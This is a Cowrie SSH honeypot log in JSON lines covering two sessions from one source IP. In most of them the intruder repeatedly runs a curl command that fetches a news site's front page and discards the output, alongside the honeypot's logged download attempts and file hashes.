{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.644829Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.683361Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.684832Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.719515Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.720996Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.745981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.754508Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.767298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.768417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.792502Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.821231Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.822398Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.849431Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.870963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.872192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:44.921716Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.922551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.929888Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:44.979745Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.019980Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.026183Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.027201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.058161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.059314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.062044Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.082633Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.083833Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.102041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.102987Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.119300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.120405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.122058Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.142105Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.143598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.164459Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.165615Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.169087Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.198137Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.227155Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.256516Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.257658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.274773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.275776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.279748Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.331418Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.332543Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.339630Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.340589Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.381576Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.383627Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.384778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.388744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.389676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.415704Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.440373Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.492081Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.493212Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.533054Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.534754Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.573654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.574912Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.576617Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:45.579231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.580214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.619834Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.621730Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.670412Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.672787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.822026Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.823232Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.856794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.995067Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:45.999418Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.039618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.040892Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.044096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.045377Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.049362Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.050843Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.070034Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.086458Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.087950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.096560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.097609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.101245Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.102426Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.127210Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.142510Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.143858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.148548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.149559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.173451Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.176063Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.180856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.182104Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.186849Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.187893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.212089Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.213538Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.289010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.290305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.293750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.294873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.347265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.348458Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.351857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.352698Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.383782Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.388289Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.389910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:46.394016Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.395092Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.452180Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.454991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:46.460781Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
